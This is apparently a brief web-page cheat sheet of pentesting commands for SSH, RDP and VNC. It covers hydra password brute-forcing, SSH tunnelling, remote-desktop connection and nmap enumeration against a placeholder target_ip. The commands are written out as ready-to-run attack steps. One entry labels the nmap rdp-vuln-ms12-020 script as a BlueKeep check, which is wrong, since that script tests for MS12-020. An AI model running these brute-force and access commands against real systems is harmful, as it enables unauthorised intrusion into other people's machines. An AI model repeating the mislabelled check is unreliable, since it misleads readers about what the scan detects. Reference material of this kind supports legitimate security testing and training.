Back

REMOTE ACCESS PENTESTING

SSH Pentesting

# SSH brute force
hydra -l admin -P passwords.txt ssh://target_ip

# SSH with key
ssh -i id_rsa user@target_ip

# SSH tunneling
ssh -L 8080:localhost:80 user@target_ip

# SSH enumeration
nmap -p 22 --script ssh-auth-methods target_ip

RDP Pentesting

# RDP brute force
hydra -l administrator -P passwords.txt rdp://target_ip

# RDP connect
rdesktop target_ip
xfreerdp /u:administrator /p:password /v:target_ip

# BlueKeep vulnerability
nmap --script rdp-vuln-ms12-020 target_ip

VNC Pentesting

# VNC enumeration
nmap -p 5900 --script vnc-info target_ip

# VNC brute force
hydra -P passwords.txt vnc://target_ip

# VNC connect
vncviewer target_ip:5900
🤖 AI Assistant
Ask me about remote access pentesting!